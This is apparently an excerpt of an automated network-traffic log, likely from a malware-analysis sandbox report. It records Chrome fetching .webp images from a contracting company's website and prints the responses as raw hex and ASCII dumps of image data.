                                              Data Ascii: rtCC 3!$^_n ~U?,%8U@g7F/+%hs\x#u\n7E$aI'+[Z2Z98sQ=!~B?@&LZ.<-t9RBuH%I:k-dX!O+ps-uw/_h
                                              2024-09-27 06:20:16 UTC8000INData Raw: 5e bf 88 c6 7b 9a ec f1 9a 1d af 92 d3 fb 84 30 9e 6b 65 76 ba 4b 04 03 7b 78 51 3c 2e 93 92 b8 38 71 15 e8 2c ad f3 d7 57 c3 01 89 5e 4b 40 60 b4 de 86 f6 7f e4 b7 67 ab b4 63 94 95 fe d7 85 47 f4 81 15 c3 5e c8 57 5b f5 06 28 dc 3c 0d 6b 07 93 d0 01 a5 87 a9 6d c4 09 84 d1 90 81 19 f1 16 e0 79 8c 69 36 8e 94 f3 19 cc 6b 16 d5 b8 97 71 e4 15 26 d1 67 0b 74 fe b2 68 2f dc 8f 84 14 09 cc da e7 f9 1b ab 09 67 b3 0c 8f 0a fd e6 d0 a0 73 8e aa 03 84 00 2f 1b ee 59 a6 8a 75 9a 0f a8 42 8e ce 14 4a a2 e6 a1 d8 10 17 d6 27 ff 85 88 a9 b2 c8 17 57 22 3b 1a df 1c 74 20 d2 ba 97 7d 49 37 ab d0 a1 98 18 29 ea 09 ca 1e 73 58 4a 16 4d a2 b1 be 34 e0 24 cd 3c fb d9 41 77 db 86 77 f1 45 05 07 f5 57 47 ae d9 0e 7c 98 b5 a2 d1 a6 ec aa 7b 59 3f 91 e1 e6 4a 53 8d d9 ef 4c
                                              Data Ascii: ^{0kevK{xQ<.8q,W^K@`gcG^W[(<kmyi6kq&gth/gs/YuBJ'W";t }I7)sXJM4$<AwwEWG|{Y?JSL
                                              2024-09-27 06:20:16 UTC8000INData Raw: e6 3f ef 5a 8d 1f 73 8b 60 45 ff e7 21 58 9a 34 63 46 5d 2f 7e 1d 83 5e e0 d3 cc d1 1c 3a f5 3e 7c 57 c5 94 0c a7 19 3f fa 8d 40 5f dd 99 b3 c6 6a 09 8b ef e8 24 7e a1 39 34 83 22 82 c0 0c 56 21 f2 29 a3 fa 6e c9 7c 53 4b d0 48 57 fc 94 da 3d 73 3c 08 ac 94 a7 37 33 8a 11 76 7d 8e 3e e2 5b 5d 73 3a 28 01 82 b1 aa b0 8a 7f fe b8 3a 90 8b 63 41 3f 42 79 1a 6f 55 2f b4 1e b3 bf 0d 64 4f e3 93 23 68 50 53 30 c5 d8 0e 82 77 77 69 63 c7 48 83 71 20 af c8 97 c6 e4 e4 e4 c1 c5 92 87 26 91 ed 53 70 95 32 2b 79 f6 a2 32 0f 95 bf 78 f9 e8 07 94 94 e8 dc 96 a1 3f 41 7e 3c 95 74 58 4f b0 7c 4d 72 a7 c9 5b d2 fe bd 11 a2 fe a0 ce fd aa 3f 16 35 7f 66 62 d9 01 09 6b fb 5d 7a d9 f7 03 93 b3 08 68 11 00 53 9a 01 e1 c7 93 ca d1 6c 2c ac cd 1c bf dc d2 2c a2 8b 4f cb 9b 8c
                                              Data Ascii: ?Zs`E!X4cF]/~^:>|W?@_j$~94"V!)n|SKHW=s<73v}>[]s:(:cA?ByoU/dO#hPS0wwicHq &Sp2+y2x?A~<tXO|Mr[?5fbk]zhSl,,O
                                              2024-09-27 06:20:16 UTC8000INData Raw: 04 48 d1 6c 83 01 17 c0 9d fc 66 3c bc b4 f9 ec 1c 05 e0 41 54 d5 d0 ca 9d 8b 5c 92 64 1f e4 5f 16 74 01 a9 d1 b9 aa a3 c9 d2 67 c5 5a e2 f1 c4 53 fb 09 11 b7 6c 4b 36 2a da 9f f7 6d e4 7b c9 91 c6 b8 16 83 7f f4 b3 b9 49 f0 6b 36 14 b6 bc db 91 a7 a4 61 19 61 e1 a0 c2 b8 40 ac 02 4e df fa 96 fe 3b af 6b d9 af ea 46 fd 02 bf 0e aa ac 04 a4 79 fb 02 eb e5 b3 b5 1e 78 b4 64 a6 f2 1e 26 b5 ee 88 6b e2 9f 72 ca 3f c3 9d f1 f9 30 f6 e5 98 33 6b 89 17 25 39 13 00 38 14 fc a6 cc d7 53 aa b5 aa a3 ea 7f 5b 08 00 5c 75 46 93 cb e8 32 84 71 f5 cf 56 e3 9d b2 4c bd d5 c8 35 39 be 99 db d3 07 f3 02 84 ff 04 30 01 a2 4c 4c b4 65 d2 15 a0 01 1d 91 b1 bd 19 c1 00 1e 33 2a e8 4b 2d ad 35 bd 42 5b fe b3 28 ae 51 1f 93 f6 02 ad 59 7a 17 de df 06 d3 f6 38 9e 06 2e b0 27 ed
                                              Data Ascii: Hlf<AT\d_tgZSlK6*m{Ik6aa@N;kFyxd&kr?03k%98S[\uF2qVL590LLe3*K-5B[(QYz8.'
                                              2024-09-27 06:20:16 UTC8000INData Raw: ee 39 46 8c 05 71 4a a2 08 04 88 f9 43 ab 54 f0 6a 1d 95 7e 75 33 6e 78 b4 e4 54 46 6c 8c c1 cc c5 ec c4 9c 42 b8 73 d1 1c 4d 22 95 cb 9f 7c 16 c5 2f 95 ec ff b2 e2 09 e2 18 ce 10 ec 71 71 a4 dd 0b 96 2f d0 fa 0e a6 c5 b1 cd 75 94 4f 4a 14 14 8d 1d df f7 9f eb 3d 64 2b 32 38 9e 28 aa 52 ce 31 fb fd bf f4 42 7d a0 09 33 f3 a8 21 9b 18 5b f6 e1 54 f0 e4 67 df a3 58 32 6f 17 96 32 b6 4f 28 da 0c fa 7c 6b 11 45 bc 83 f6 70 8d aa 19 47 20 4a c5 60 73 0b 07 5b ef 39 0a 2b 09 ed a5 70 42 9e 1f 56 51 04 67 dd 41 bc 12 9b 50 99 07 43 0a db cc 07 b7 ae a2 cf 0f c5 f5 5a c0 77 52 44 7a 99 8a 05 3b 9a 63 78 e8 02 cb 00 65 01 21 5f 5f b0 90 58 7e e1 71 83 c1 1d ed a7 a2 31 f9 74 0d f1 e7 29 be 4f e4 fa 41 34 7e fc ec 22 3a f4 0d ba 71 4e 31 b2 8c fb d1 da 88 b9 8e 35
                                              Data Ascii: 9FqJCTj~u3nxTFlBsM"|/qq/uOJ=d+28(R1B}3![TgX2o2O(|kEpG J`s[9+pBVQgAPCZwRDz;cxe!__X~q1t)OA4~":qN15
                                              2024-09-27 06:20:16 UTC8000INData Raw: 7c 29 fc f3 54 a8 76 f1 06 e7 88 f8 03 b6 7e 9b 4a e4 03 d8 d4 4b ec ac b5 4b 6d 38 b5 6f 43 44 9a 25 6c 1f d1 9b ee e1 e7 0b 12 52 2e 5b 79 44 b5 d2 b2 bd 14 58 d5 82 ff d9 10 42 5b ea ba 4f cb 8b 35 44 8d e5 e7 cb 81 0c 33 4d 4d b1 0f 4b 11 3e 51 db ab 73 f8 a2 cd f1 c6 d8 f2 b6 95 2d 4e 71 29 15 8c 92 bc e1 25 5e bc 51 a5 2c 7e cd 5d 45 21 11 a7 58 0c 8d cb b9 1f ee a9 29 c9 e0 86 78 c2 74 bb 9c 9c 4a ff e8 9e 95 e5 85 9e a3 ac a3 04 d5 48 3c 96 a2 4d 2f a3 e7 31 ae aa 0e 83 aa 23 1e 8b 6e dd 9c 9c 6b 43 91 15 49 56 9c b1 2f ff 50 81 25 75 ce db 44 d9 43 0f 5c c1 fa bc 06 c1 2f 74 81 e2 51 e3 cf ef 7a b5 a8 9d 21 95 9c 0d e9 74 29 0a 05 b7 c5 7f 31 5f 3a f8 3b de 76 2d 28 c8 a3 7e cd be 16 6e 32 fa a3 23 04 62 09 67 9d 9c b7 67 25 78 8c f8 82 11 40 83
                                              Data Ascii: |)Tv~JKKm8oCD%lR.[yDXB[O5D3MMK>Qs-Nq)%^Q,~]E!X)xtJH<M/1#nkCIV/P%uDC\/tQz!t)1_:;v-(~n2#bgg%x@
                                              2024-09-27 06:20:16 UTC8000INData Raw: 93 8c a1 4a 76 c0 35 c3 6e ec a7 62 52 1e 39 b2 02 d8 6d df 65 20 b4 1b ce 7b 7d 3d 07 ad 20 1a 6a 27 7b 5c 25 e1 e0 61 70 e8 79 d0 68 37 af 98 04 5a 0d 79 70 a0 f8 b2 85 ad 2d 28 6e 33 f3 71 8e ae 8d 46 fc b4 72 25 c6 88 4d 1c 54 26 3e 41 b5 bb 3b 82 6c 56 31 1b f1 30 61 fc 37 ad 6d 7e 76 25 28 e0 11 13 01 c6 66 c6 42 f8 af c0 28 2e 46 c3 d6 a0 1f f0 49 87 10 1d fe ea 17 8f 3f 42 fa d4 fc 51 49 0a 53 94 19 f1 3a 51 30 2f d3 e5 6f 21 93 1e de 95 5e 92 a3 75 73 7d 91 ae 40 f4 3c 57 47 a1 25 09 89 92 2e 82 08 8d d3 c3 30 30 40 ad b2 4d 69 82 46 52 f4 46 21 b5 6c d8 1f a4 18 07 bf fa e6 71 85 3f 4f 5a e3 3c ec 22 5e bf 69 99 01 61 55 b4 ae c9 f4 ce e4 cd 83 78 0f 53 db 06 f1 05 ae 36 10 c4 8c 5b e3 dd 4c 93 b6 a1 bb 10 0f 79 e0 54 08 8b d4 79 bc f4 86 1f 31
                                              Data Ascii: Jv5nbR9me {}= j'{\%apyh7Zyp-(n3qFr%MT&>A;lV10a7m~v%(fB(.FI?BQIS:Q0/o!^us}@<WG%.00@MiFRF!lq?OZ<"^iaUxS6[LyTy1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              93192.168.2.465429173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC464OUTGET /uploads/projects/1/c10a34a38c54c09dea6d4e76cb363989.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 06:28:03 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 417402
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7930INData Raw: 52 49 46 46 72 5e 06 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 c0 0c 00 96 09 00 56 50 38 20 fe 5d 06 00 30 d8 22 9d 01 2a c1 0c 97 09 3e e9 6c af 52 a9 25 bd bb a5 53 fa 6b b0 1d 09 65 6e 2d 7e e4 9e d3 ca 8b e4 f1 d0 79 6d 6e f1 8c 6f f7 fb 05 23 8f 10 07 30 10 c9 39 af 28 fd 4f ea b8 8c a8 3f 03 fe df ef 1c fa 38 ff 1f 2d 43 e3 1f fa 9e 45 fe cf ea 09 e1 cf e3 2b bb 1e c1 7e 63 19 c9 7d 8f d4 5b ff 8f a8 0f eb 1f f7 3a 97 7f e7 e8 5f f9 df 38 7c e3 2d 65 ec 17 ad 7f 9e 8a 7c c3 eb df fa bf 5b fb ff ff af ce 57 fc fc 98 f8 8f fd be 84 1e d9 f7 ff fe 87 b6 ef fd 3e bb bf ca 7e 77 fc 14 ff b8 ff e9 eb 23 ff 97 af ff f0 df fc fd 51 fe f5 7a bf 7f ef fd e8 f7 d7 fe 37 d4 57 fb 9f a6 5f ef ff bc bf f7 1f fe 7f ff ff f8 fc 2f ff 3a ff a1 ff ff da b3
                                              Data Ascii: RIFFr^WEBPVP8XVP8 ]0"*>lR%Sken-~ymno#09(O?8-CE+~c}[:_8|-e|[W>~w#Qz7W_/:
                                              2024-09-27 06:20:17 UTC8000INData Raw: a6 53 2d ab 81 ca 3c 73 b9 ce 6e 63 03 f0 83 d9 89 56 a2 36 c0 d9 0b ee 9c 10 71 d0 e1 c9 ad de 6d be c9 8f 96 c3 c9 19 15 83 d1 9f 5d 5e ca 44 f0 46 fc 90 61 19 b9 9a 03 56 0c d9 2f 4c 9f e1 bc 5c eb e5 73 5a 3a 13 86 d5 0b 03 9c a9 97 25 e3 27 af e5 b0 b8 c9 bc 6f 99 30 b8 c9 85 c6 4c 2e 32 61 71 93 0d 8d b0 12 ed 80 97 6c 04 bb 68 54 c0 eb 26 07 4d 0c f4 6e 13 b3 b9 2f 07 12 37 d8 56 9a ff 64 61 ba c0 30 91 b8 41 76 ce 92 5c c4 10 b5 ce 9c 46 59 eb 66 6f 8b 48 49 24 4d da fb c0 50 6f dd 08 f5 f8 36 ee 72 5f 5a 9a 4a 64 70 39 59 32 cd b5 56 57 6a 56 db 4e e9 e9 75 b7 89 80 0b 7c fc f6 f3 90 c4 27 03 9f 4e a6 9d 05 99 59 e5 b5 16 eb 9d d2 a9 dc 9c 80 ad 5d ad 68 8a a9 f6 af d3 cb 56 86 0c 85 f2 df 86 ae ed ac 3b 78 56 2e 7f a5 9c cf 4f 74 1b 42 c1 94 c4
                                              Data Ascii: S-<sncV6qm]^DFaV/L\sZ:%'o0L.2aqlhT&Mn/7Vda0Av\FYfoHI$MPo6r_ZJdp9Y2VWjVNu|'NY]hV;xV.OtB
                                              2024-09-27 06:20:17 UTC8000INData Raw: 97 f0 ed 87 e8 b8 c9 85 c5 f6 76 da c5 c3 d6 c2 e0 3a 5c be b2 04 0b 2b c1 c1 04 42 df 42 18 b3 48 2b fb 65 b9 e9 98 d2 c1 0e f0 88 40 99 10 77 f6 01 9b 9a 49 dc 33 1d 21 ea 13 56 73 bd 43 d2 0c 5f 40 76 b8 15 fa 7d 33 5a 44 7e 46 61 00 f0 bf 60 68 fc c8 03 49 55 19 7e f3 84 01 81 24 f2 68 1f 33 61 c1 9e e0 31 6e 85 6e b1 84 66 7b 80 24 fc d9 92 92 b2 9b 9e 9d 35 95 44 fd 7b c3 d0 42 56 f8 e6 2f db 5e da 04 fe 3e 95 bc 01 0e ed 3e 25 e2 f1 bf e6 79 bb 2d 70 88 ff 4c 79 43 75 ab c5 be 50 ee bf 60 2b fe ad f9 da 16 23 24 f4 cc 13 d5 f2 87 5a 0e 18 03 f6 a2 5c 9f 7d 56 3a 62 28 e4 23 6c a1 bf 9c c5 99 f7 af eb 04 30 9f 88 e5 00 c8 c1 e5 e6 06 7e 98 0d b6 f2 b2 53 09 e0 65 2f 5d ea 3e d5 a0 e3 ed e1 0c 92 be 9b 5a 40 94 b5 99 a3 e7 f7 3a 94 c9 94 61 27 96 5f
                                              Data Ascii: v:\+BBH+e@wI3!VsC_@v}3ZD~Fa`hIU~$h3a1nnf{$5D{BV/^>>%y-pLyCuP`+#$Z\}V:b(#l0~Se/]>Z@:a'_
                                              2024-09-27 06:20:17 UTC8000INData Raw: 76 2b ac 2a 58 b1 26 07 59 2a d8 2f 68 42 c8 ae b5 63 7c f8 ff cb 69 a6 b1 c3 b3 d6 bf 05 3c da 3e 89 69 78 2c 30 58 8e b3 c8 67 bf fd c9 fd 3f e9 d4 c3 2d 28 33 96 80 b1 ef 78 9d 1f 51 df ff 7f 1b fe ab 56 67 24 9e b0 ff bb bf d3 fa 74 be 52 7c 85 55 10 7e b0 6d 5d b3 54 63 f0 a9 d1 ba b6 9c fc e2 1c c9 21 c7 43 ab 74 c9 16 85 4c 32 1d 79 74 94 df 99 49 9e 61 54 5e a6 b2 ea 38 5f fc 4a dd 17 6c ff f6 67 1e e6 f7 aa 0d 6a 51 d3 06 7e 0e 35 d5 27 f9 54 20 2c 6e 64 ac 5f 4f b1 bf 11 97 d3 c1 a9 36 7d c7 82 8a 4a da 16 f7 1b 5d 49 f6 c3 0c ba e8 f2 41 72 ce ac 05 5d fa f9 07 e0 30 93 a7 9b 0f af b3 5b 2c 3e 00 f3 95 e4 a6 41 fa 5a 24 8c 84 21 13 cd 19 69 a6 26 50 d4 04 da 97 d8 a6 67 28 71 d5 31 bb 3a 32 fe 39 c1 b2 01 87 31 1c e1 34 08 f7 83 74 5c 7c 2a b1
                                              Data Ascii: v+*X&Y*/hBc|i<>ix,0Xg?-(3xQVg$tR|U~m]Tc!CtL2ytIaT^8_JlgjQ~5'T ,nd_O6}J]IAr]0[,>AZ$!i&Pg(q1:2914t\|*
                                              2024-09-27 06:20:17 UTC8000INData Raw: be 35 37 ed cd 68 a9 61 72 f3 6b b6 4a ff 38 3f ac 6e 28 57 30 91 0e 4b 18 e9 b9 9d ec f8 5b f9 40 6e 23 41 64 6f e7 95 83 2d ca 50 cd 1d 18 b4 7c ba 1d c4 ed 1d d4 85 82 4c 36 88 c5 47 13 07 cd 91 ff 6d 43 c5 8e be 79 44 d4 1b f1 58 f6 c5 90 0f 2f 1c 6b c9 be 07 6a d6 44 04 8c 3f 05 e2 66 ac 6d db f1 b2 b8 73 ef dc 02 1f 45 1b 31 26 05 ac 38 9d af f5 98 18 26 2b ae ee 85 b5 36 b3 36 1c 49 50 9f 21 85 4b 35 f1 6c 5b 48 1c 41 78 03 5c 09 31 d5 59 d1 aa 6b 2a 07 41 ec d9 04 a4 46 57 1a 7e 5b 08 e6 2b 84 a2 ad 9b 44 1a 46 00 f3 f9 67 f8 82 5f c7 f8 91 39 c5 34 aa 51 77 fa ff 3c 86 3d ed 82 7b 38 b4 4c bf f5 49 49 c3 aa 26 44 e2 2b e1 ea fe 5b 0b 92 cf d3 6f c7 59 bd 07 b7 d6 91 c3 cc b6 e1 bd 4f cb 1c b7 8d f4 ce 46 4d c8 da 04 9d 56 22 3a 86 52 02 b6 39 fd
                                              Data Ascii: 57harkJ8?n(W0K[@n#Ado-P|L6GmCyDX/kjD?fmsE1&8&+66IP!K5l[HAx\1Yk*AFW~[+DFg_94Qw<={8LII&D+[oYOFMV":R9
                                              2024-09-27 06:20:17 UTC8000INData Raw: ef 7c b2 0b 79 66 3c 74 78 96 36 c8 6a 8e b3 b4 39 73 31 67 04 46 92 c9 a8 f5 b0 4e ad 62 74 2c 41 81 20 27 e9 91 74 0a 47 c5 6b dd 0b 12 ce 2e e7 13 16 16 cb a2 96 6e 9a 6c 24 49 7a b9 c2 c0 01 5f fe e9 6b 8f ff 49 49 5f 3e 21 c0 5a 89 19 a4 ac b8 ea fa 56 ea 77 d1 e3 da 74 dd 6a 57 06 bf 3b 78 22 38 9a 41 cd 4b 6e fb 49 92 6d 84 90 70 8f 6f 95 2c e1 9c 94 c5 3f d2 ec 2d f6 5d 2a b7 fa 44 ce 4f 89 3c ca ab db 98 b0 9a e5 1e c9 be 2b 65 bb 5e bd b8 52 a3 77 73 8c 19 39 9c 55 96 79 96 f7 d2 fc a4 00 31 b1 29 c6 e9 61 62 2e cb f6 b1 c9 88 a3 4b ce 42 fa 79 30 91 d4 d3 df 6c cd a4 1b d8 8d 00 aa af c3 64 f7 b4 51 92 e8 61 88 7f f6 32 1b ec e3 33 f6 68 71 bb d5 0d 74 6b 4f c5 ae a3 2e 98 65 06 ff 5c 0a 6b d9 a9 a9 38 a7 e3 9b e9 0a 11 6b 9f b4 0d ff be 28 4a
                                              Data Ascii: |yf<tx6j9s1gFNbt,A 'tGk.nl$Iz_kII_>!ZVwtjW;x"8AKnImpo,?-]*DO<+e^Rws9Uy1)ab.KBy0ldQa23hqtkO.e\k8k(J
                                              2024-09-27 06:20:17 UTC8000INData Raw: d9 79 a9 dc d7 ef 36 ee 3a 76 d2 03 80 21 78 df 87 40 91 7e 61 47 a3 82 5c ef 06 c4 88 b3 5c 73 16 24 12 5f 61 47 5f 8e 0d d7 05 f9 65 6b 64 ed 8c 2c 02 d6 fe 9a 97 4b 17 33 54 d9 4d 6c 67 1e ba 51 96 f2 35 1e 04 ff 7c 60 88 94 8b cd f3 9e 95 c9 e9 95 88 b1 c5 66 af 76 f8 36 65 3b 11 67 d8 10 b0 ed 4d b6 65 64 b3 fc 9e cb 08 6a f3 6f 92 40 ee f6 ad 4a 5e 49 ff 7d 1f 9b eb 33 b6 a8 e5 69 e1 8a d1 e0 aa 71 3b 0a 44 52 f8 5d 03 40 8f 09 ba 29 0c 7d ca f1 56 56 cc 29 e0 1a 8a 7f 7d f0 ea af d8 ea 5d fe 06 ad 61 08 f1 6b c3 ae 26 89 cf 79 70 1d 1c 9b 77 61 2e 37 1a 75 a3 1c 94 94 db e0 fb c4 ff 48 07 c1 58 d4 03 9d 09 08 6f c4 6f 0d c6 81 6d 95 b6 b4 12 92 3a bd 23 38 54 98 e6 56 30 68 30 36 d9 12 27 f2 24 8e 15 a3 42 77 34 14 8a f4 03 46 67 86 b5 22 e7 c3 98
                                              Data Ascii: y6:v!x@~aG\\s$_aG_ekd,K3TMlgQ5|`fv6e;gMedjo@J^I}3iq;DR]@)}VV)}]ak&ypwa.7uHXoom:#8TV0h06'$Bw4Fg"
                                              2024-09-27 06:20:17 UTC8000INData Raw: 2f ae 3e 42 22 a8 7a 73 43 2f 15 58 c8 00 2a fe 6a ef b4 46 5f 6f e7 0b 03 87 21 65 bb 40 ce 2b 24 e8 2e a4 55 aa 91 7d c0 17 34 50 be 1c 2a 1e 5a f9 5b 9e 09 65 c3 79 fa b2 01 d9 c6 3d fb a5 38 69 c0 ee 42 37 53 e8 40 29 7a b7 9e 6f cf 4d e9 c0 ce a0 5a 30 b5 9f 3d c4 1b 92 32 d7 23 43 f9 bc cd 07 c4 bb 48 68 47 77 3b 9a b6 c0 1b f5 8f 5b 89 45 6e 99 0e 79 2a 9d 0b 9b 99 1c ed fb 1b 7f 3c 45 66 68 de 82 13 40 ee a3 31 d2 ae fc a4 3a 17 91 f8 5a 82 2c 4c 7e 02 c0 bc 2e 81 a2 60 8d 27 e2 f0 da 13 c5 b6 d9 c1 77 ce b0 1c 52 46 76 c6 92 d3 1d a4 21 2a 3c dd 5a c6 a4 bc a9 92 49 12 7a d5 15 c7 d0 36 7c e3 c2 e0 f0 e6 c6 04 19 7c 10 d3 57 38 2c 8a 25 52 ea 29 13 ad d9 3d ed 5a 43 49 51 72 0d b0 b0 02 35 d1 bd f9 b5 e9 d3 86 c6 6f f9 5d b8 80 58 57 8f 34 64 3f
                                              Data Ascii: />B"zsC/X*jF_o!e@+$.U}4P*Z[ey=8iB7S@)zoMZ0=2#CHhGw;[Eny*<Efh@1:Z,L~.`'wRFv!*<ZIz6||W8,%R)=ZCIQr5o]XW4d?
                                              2024-09-27 06:20:17 UTC8000INData Raw: 68 9f 30 46 54 a6 35 83 e4 5e 16 58 da 27 34 78 85 cb ad 91 d0 bb 2d 67 27 c6 d9 e2 25 97 47 c0 b0 12 15 46 8a 1c 1c 0c 5c 65 e6 2c d4 50 b0 ac a8 8b 67 78 f1 9f cc 87 b7 5d 37 f5 c2 b6 99 a2 42 53 78 3b aa f9 e0 6b 83 9a 47 7f 28 46 6e 76 32 8a 72 78 34 88 0a dd 5f 9c 6b 17 ed 5e a1 ab 56 f9 22 d9 18 86 df 00 51 1a d6 f1 70 23 61 69 2f 9b ba b6 0c 5a 7f fc fd 84 d3 a7 ca 1d a2 09 7e 7a 23 73 20 e2 34 56 87 33 59 b4 bf 41 ee 84 2c 95 ad b1 47 19 00 77 0a f3 a1 a2 b2 34 0c 18 82 12 a7 44 47 a1 84 9e bc 83 a0 e1 6d 32 cc 15 da 57 9c 03 17 a1 fa 84 6d a8 6b fd b5 ac f6 7a 28 1b 87 c0 6f 98 54 10 62 57 d1 a8 c3 da c4 38 16 d0 4c 96 4f d7 e6 8e 84 c9 9f 87 b7 52 3a 1b d4 bd 0e 48 12 99 f4 ce ba ba 9d 82 55 8f dc a4 44 f1 79 14 94 0c 31 f7 db df dd 91 35 94 01
                                              Data Ascii: h0FT5^X'4x-g'%GF\e,Pgx]7BSx;kG(Fnv2rx4_k^V"Qp#ai/Z~z#s 4V3YA,Gw4DGm2Wmkz(oTbW8LOR:HUDy15
                                              2024-09-27 06:20:17 UTC8000INData Raw: 55 b8 56 f7 a1 30 9c a9 2c 40 7a c2 82 60 cf 08 0f 84 2e 08 7c 8d 3d 76 4e bc f1 5b ea 2c 06 12 9a 21 da b9 32 44 0c 27 0d 89 0e fe 61 e6 b2 fe cc a9 3b f1 7e 3b 90 a9 4c 98 a4 f3 de 60 11 1a 6b b0 b0 db 3f 7f 66 02 0a 5e d1 33 dc 99 a9 0a 99 c4 be 3f 97 09 5b ea 41 16 ff b6 57 53 60 b2 b8 d8 1d 80 d7 a6 6c 3a 67 0e ea 14 bb eb f0 a5 ba 70 40 89 75 d0 67 da e4 70 e4 f1 06 23 83 f3 ef 95 e7 24 34 3c 49 6a 0a e9 fc 88 3a 0e cd d1 65 b6 68 8f ae 7d 8f 80 a9 93 92 66 21 5b 62 d7 00 6e a7 01 07 9c 9d b7 0e d8 48 77 98 4c ec f6 98 28 ce 51 7a ac ef 79 a9 31 ae e8 c1 72 75 20 79 c0 da 4d 91 ae 8b 13 45 44 83 b0 27 b8 ce db 9e 1c d3 d2 93 f6 45 7b 2e 0b 68 d6 44 d0 c2 d5 93 8b 51 6f 29 28 a4 9f 59 32 62 e2 f2 f1 e5 a0 3a 86 be b7 ff 47 f4 b5 65 be 26 e9 61 97 46
                                              Data Ascii: UV0,@z`.|=vN[,!2D'a;~;L`k?f^3?[AWS`l:gp@ugp#$4<Ij:eh}f![bnHwL(Qzy1ru yMED'E{.hDQo)(Y2b:Ge&aF


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              94192.168.2.465438173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC724OUTGET /uploads/projects/30/d32187d7377ba8b456ad17d703a1f7c9.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:59:57 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 56086
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 0e db 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 9a da 00 00 10 21 05 9d 01 2a cf 04 a3 03 3e e9 70 af 53 29 26 3d b4 24 32 ba 63 b0 1d 09 67 6d e7 d7 5f ef b4 c5 ef f8 ba 85 b2 f8 42 90 8b a1 ff e4 e6 46 5d 7c aa 7c 63 ea 35 1a ba a4 c0 e2 26 bd 7e 2c cf 89 5d 49 ff 4d ff bf fd 57 94 cf a0 ff 9c f6 00 f2 5b ff 53 be 2f ba 7f c7 f6 0d fe c3 fe 77 d5 83 3a 4f f1 76 ea a7 df 63 a7 fa 9e ca 8f 5a cf dd 9f 68 dd 52 fd 47 4e bf 9b ee f7 a3 db 9d 2e f3 2e e0 83 ff af a0 2f a1 7f af fb 99 e5 2f ea 3f a1 ff a7 fd 67 bb 7e 33 ff 2b c1 cf f1 7f d9 b3 a9 f7 f9 e2 ef ed 7f cd fa 0e fe df e2 a5 fa 3e 20 da d7 fd 4f 41 af 7a 7f 23 e9 07 3e 0f ce 68 c9 ce 8c f1 df fa fe f5 fb 17 fd c7 ff 37 ef 4f bb 5f fd 0f dd 0e df
                                              Data Ascii: RIFFWEBPVP8XVP8 !*>pS)&=$2cgm_BF]||c5&~,]IMW[S/w:OvcZhRGN..//?g~3+> OAz#>h7O_
                                              2024-09-27 06:20:17 UTC8000INData Raw: 35 6e 26 b3 74 70 a9 4a dd 06 18 1b 55 88 29 da 1e 52 1a a2 de cd ed 2f a6 08 62 7d 68 2d 6c 0b a2 d2 1e 51 b8 31 b7 5d c0 fc 31 f4 66 32 58 5e ed f8 86 de c2 8e a1 f4 53 23 55 66 26 48 f1 4c 9c bf 92 d0 cd 81 7d 0d e7 57 b0 d7 bb de d3 0d 3c 87 1a 4f 03 b4 d2 5d df fc 77 42 60 bd 6e 9e ef fa 9f cb 5b bd ca fb ac 53 f6 7e ae 57 3d c0 f0 d2 c0 9a 37 e4 69 74 1d 60 6f 5d 1b 59 07 83 0b 01 57 bf e1 3d 7d 99 24 0b 72 c1 23 1f ae 91 b6 b8 37 e3 31 18 d5 f5 d3 4f 6b 37 14 97 90 d5 23 83 05 7f c1 f3 5f 39 2d 52 3c 66 ba a8 20 5e 30 cc a1 02 8a 52 2a ad 22 a1 a1 03 db cb 64 30 f7 73 39 5a a1 d2 7a 7f c9 4e 43 19 c1 35 5d 93 fd c9 c5 51 f8 27 4c 9a 60 03 59 42 cf 2d 63 ae 7d 01 40 67 3a 9a 60 fd d1 47 08 74 c3 fc 1a f7 50 05 cc 70 81 a8 79 8e 68 f2 ab 46 0e 69 96
